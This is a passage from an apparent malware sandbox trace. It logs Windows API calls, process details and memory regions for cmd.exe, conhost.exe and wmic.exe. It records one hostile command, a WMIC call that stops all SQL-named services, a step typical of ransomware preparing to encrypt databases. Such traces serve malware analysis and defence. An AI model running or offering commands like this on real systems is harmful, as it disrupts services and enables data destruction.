lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0xffffffff [0104.598] GetLastError () returned 0x2 [0104.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.598] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0xffffffff [0104.598] GetLastError () returned 0x2 [0104.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0xffffffff [0104.598] GetLastError () returned 0x2 [0104.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0xffffffff [0104.598] GetLastError () returned 0x2 [0104.598] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0x4fcb390 [0104.598] FindClose (in: hFindFile=0x4fcb390 | out: hFindFile=0x4fcb390) returned 1 [0104.598] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0xffffffff [0104.598] GetLastError () returned 0x2 [0104.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4caf1a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4caf1a8) returned 0x4fcb390 [0104.599] FindClose (in: hFindFile=0x4fcb390 | out: hFindFile=0x4fcb390) returned 1 [0104.599] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0104.599] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0104.599] GetConsoleTitleW (in: lpConsoleTitle=0x4caf69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0104.601] InitializeProcThreadAttributeList (in: lpAttributeList=0x4caf5c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4caf5ac | out: lpAttributeList=0x4caf5c8, lpSize=0x4caf5ac) returned 1 [0104.601] UpdateProcThreadAttribute (in: lpAttributeList=0x4caf5c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x4caf5b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4caf5c8, lpPreviousValue=0x0) returned 1 [0104.601] GetStartupInfoW (in: lpStartupInfo=0x4caf600 | out: lpStartupInfo=0x4caf600*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.601] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0104.602] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0104.602] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0104.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4caf550*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4caf59c | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE", lpProcessInformation=0x4caf59c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc8c, dwThreadId=0xc90)) returned 1 [0104.608] CloseHandle (hObject=0xa4) returned 1 [0104.608] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0104.608] GetEnvironmentStringsW () returned 0x4fc9f30* [0104.608] FreeEnvironmentStringsA (penv="=") returned 1 [0104.608] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0105.312] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4caf534 | out: lpExitCode=0x4caf534*=0x0) returned 1 [0105.313] CloseHandle (hObject=0xa8) returned 1 [0105.313] _vsnwprintf (in: _Buffer=0x4caf61c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4caf53c | out: _Buffer="00000000") returned 8 [0105.313] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0105.313] GetEnvironmentStringsW () returned 0x4fcb390* [0105.313] FreeEnvironmentStringsA (penv="=") returned 1 [0105.313] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.313] GetEnvironmentStringsW () returned 0x4fcb390* [0105.313] FreeEnvironmentStringsA (penv="=") returned 1 [0105.313] DeleteProcThreadAttributeList (in: lpAttributeList=0x4caf5c8 | out: lpAttributeList=0x4caf5c8) [0105.313] _get_osfhandle (_FileHandle=1) returned 0x3c [0105.313] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0105.313] _get_osfhandle (_FileHandle=1) returned 0x3c [0105.314] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0105.314] _get_osfhandle (_FileHandle=0) returned 0x38 [0105.314] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0105.314] SetConsoleInputExeNameW () returned 0x1 [0105.314] GetConsoleOutputCP () returned 0x1b5 [0105.314] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0105.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.314] exit (_Code=0) Thread: id = 146 os_tid = 0xc84 Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xa4b7000" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xc6c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1716 start_va = 0x7fa7a000 end_va = 0x7fa7afff entry_point = 0x0 region_type = private name = "private_0x000000007fa7a000" filename = "" Region: id = 1717 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1718 start_va = 0x1f43d10000 end_va = 0x1f43d2ffff entry_point = 0x0 region_type = private name = "private_0x0000001f43d10000" filename = "" Region: id = 1719 start_va = 0x1f43d30000 end_va = 0x1f43d43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f43d30000" filename = "" Region: id = 1720 start_va = 0x1f43d50000 end_va = 0x1f43d8ffff entry_point = 0x0 region_type = private name = "private_0x0000001f43d50000" filename = "" Region: id = 1721 start_va = 0x7df5ff7d0000 end_va = 0x7ff5ff7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7d0000" filename = "" Region: id = 1722 start_va = 0x7ff6c48e0000 end_va = 0x7ff6c4902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48e0000" filename = "" Region: id = 1723 start_va = 0x7ff6c4903000 end_va = 0x7ff6c4903fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4903000" filename = "" Region: id = 1724 start_va = 0x7ff6c490e000 end_va = 0x7ff6c490ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490e000" filename = "" Region: id = 1725 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1726 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1727 start_va = 0x1f43eb0000 end_va = 0x1f43faffff entry_point = 0x0 region_type = private name = "private_0x0000001f43eb0000" filename = "" Region: id = 1728 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1729 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1730 start_va = 0x1f43d10000 end_va = 0x1f43d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f43d10000" filename = "" Region: id = 1731 start_va = 0x1f43d20000 end_va = 0x1f43d26fff entry_point = 0x0 region_type = private name = "private_0x0000001f43d20000" filename = "" Region: id = 1732 start_va = 0x1f43d90000 end_va = 0x1f43e4dfff entry_point = 0x1f43d90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1733 start_va = 0x1f43e50000 end_va = 0x1f43e8ffff entry_point = 0x0 region_type = private name = "private_0x0000001f43e50000" filename = "" Region: id = 1734 start_va = 0x1f43e90000 end_va = 0x1f43e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f43e90000" filename = "" Region: id = 1735 start_va = 0x1f43ea0000 end_va = 0x1f43ea6fff entry_point = 0x0 region_type = private name = "private_0x0000001f43ea0000" filename = "" Region: id = 1736 start_va = 0x1f43fb0000 end_va = 0x1f43fb0fff entry_point = 0x0 region_type = private name = "private_0x0000001f43fb0000" filename = "" Region: id = 1737 start_va = 0x1f43fc0000 end_va = 0x1f43fc0fff entry_point = 0x0 region_type = private name = "private_0x0000001f43fc0000" filename = "" Region: id = 1738 start_va = 0x1f44100000 end_va = 0x1f4410ffff entry_point = 0x0 region_type = private name = "private_0x0000001f44100000" filename = "" Region: id = 1739 start_va = 0x1f44110000 end_va = 0x1f44297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f44110000" filename = "" Region: id = 1740 start_va = 0x1f442a0000 end_va = 0x1f44420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f442a0000" filename = "" Region: id = 1741 start_va = 0x1f44430000 end_va = 0x1f4582ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001f44430000" filename = "" Region: id = 1742 start_va = 0x7ff6c47e0000 end_va = 0x7ff6c48dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47e0000" filename = "" Region: id = 1743 start_va = 0x7ff6c490c000 end_va = 0x7ff6c490dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490c000" filename = "" Region: id = 1744 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1745 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1746 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1747 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1748 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1749 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1750 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1751 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1752 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1753 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1754 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1755 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 143 os_tid = 0xc78 Thread: id = 144 os_tid = 0xc7c Thread: id = 145 os_tid = 0xc80 Process: id = "27" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x466b7000" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xc6c" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1769 start_va = 0xb60000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 1770 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1771 start_va = 0xb90000 end_va = 0xba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1772 start_va = 0xbb0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 1773 start_va = 0xbf0000 end_va = 0xc2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1774 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 1775 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1776 start_va = 0xc50000 end_va = 0xc51fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1777 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 1778 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 1779 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1780 start_va = 0x7f600000 end_va = 0x7f622fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f600000" filename = "" Region: id = 1781 start_va = 0x7f628000 end_va = 0x7f628fff entry_point = 0x0 region_type = private name = "private_0x000000007f628000" filename = "" Region: id = 1782 start_va = 0x7f62b000 end_va = 0x7f62dfff entry_point = 0x0 region_type = private name = "private_0x000000007f62b000" filename = "" Region: id = 1783 start_va = 0x7f62e000 end_va = 0x7f62efff entry_point = 0x0 region_type = private name = "private_0x000000007f62e000" filename = "" Region: id = 1784 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1785 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1786 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1787 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1788 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1789 start_va = 0xcd0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1790 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1791 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1792 start_va = 0xe40000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1793 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1794 start_va = 0xb60000 end_va = 0xb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 1795 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 1796 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 1797 start_va = 0xce0000 end_va = 0xd9dfff entry_point = 0xce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1798 start_va = 0xda0000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 1799 start_va = 0x10c0000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 1800 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1801 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1802 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1803 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1804 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1805 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1806 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1807 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1808 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1809 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1810 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1811 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1812 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1813 start_va = 0x7f500000 end_va = 0x7f5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f500000" filename = "" Region: id = 1814 start_va = 0x7f625000 end_va = 0x7f627fff entry_point = 0x0 region_type = private name = "private_0x000000007f625000" filename = "" Region: id = 1815 start_va = 